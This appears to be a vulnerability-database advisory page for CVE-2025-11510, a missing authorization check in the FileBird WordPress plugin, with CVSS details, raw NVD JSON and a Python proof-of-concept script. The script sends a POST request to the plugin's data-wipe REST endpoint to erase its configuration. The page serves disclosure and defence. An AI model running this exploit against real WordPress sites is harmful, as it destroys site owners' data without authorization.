Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-11510 CVSS 4.3 MEDIUM

CVE-2025-11510

Published: 2025-10-18 07:15:35
Last Modified: 2026-04-15 00:35:42

Description

The FileBird – WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /filebird/v1/fb-wipe-clear-all-data function in all versions up to, and including, 6.4.9. This makes it possible for authenticated attackers, with author-level access and above, to reset all of the plugin's configuration data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FileBird Plugin <= 6.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-11510 PoC - FileBird Plugin Unauthorized Data Reset # Target: WordPress site with FileBird plugin <= 6.4.9 # Required: Authenticated user with Author-level access or above TARGET_URL = "http://target-wordpress-site.com" # WordPress REST API nonce obtained from an authenticated session NONCE = "your_authenticated_nonce_here" COOKIES = { "wordpress_logged_in_xxx": "your_authenticated_cookie_here" } def exploit_clear_alldata(): """ Exploit the missing capability check on /filebird/v1/fb-wipe-clear-all-data endpoint to reset all FileBird plugin configuration data. """ endpoint = f"{TARGET_URL}/wp-json/filebird/v1/fb-wipe-clear-all-data" headers = { "Content-Type": "application/json", "X-WP-Nonce": NONCE } # Send POST request to trigger the data wipe functionality response = requests.post( endpoint, headers=headers, cookies=COOKIES, json={} ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("[+] Exploit successful! All FileBird data has been wiped.") else: print("[-] Exploit failed.") if __name__ == "__main__": exploit_clear_alldata()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11510", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FileBird – WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /filebird/v1/fb-wipe-clear-all-data function in all versions up to, and including, 6.4.9. This makes it possible for authenticated attackers, with author-level access and above, to reset all of the plugin's configuration data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3379856/filebird/trunk/includes/Classes/Convert.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60ed7738-5cba-4fc0-9178-265773555369?source=cve", "source": "[email protected]"}]}}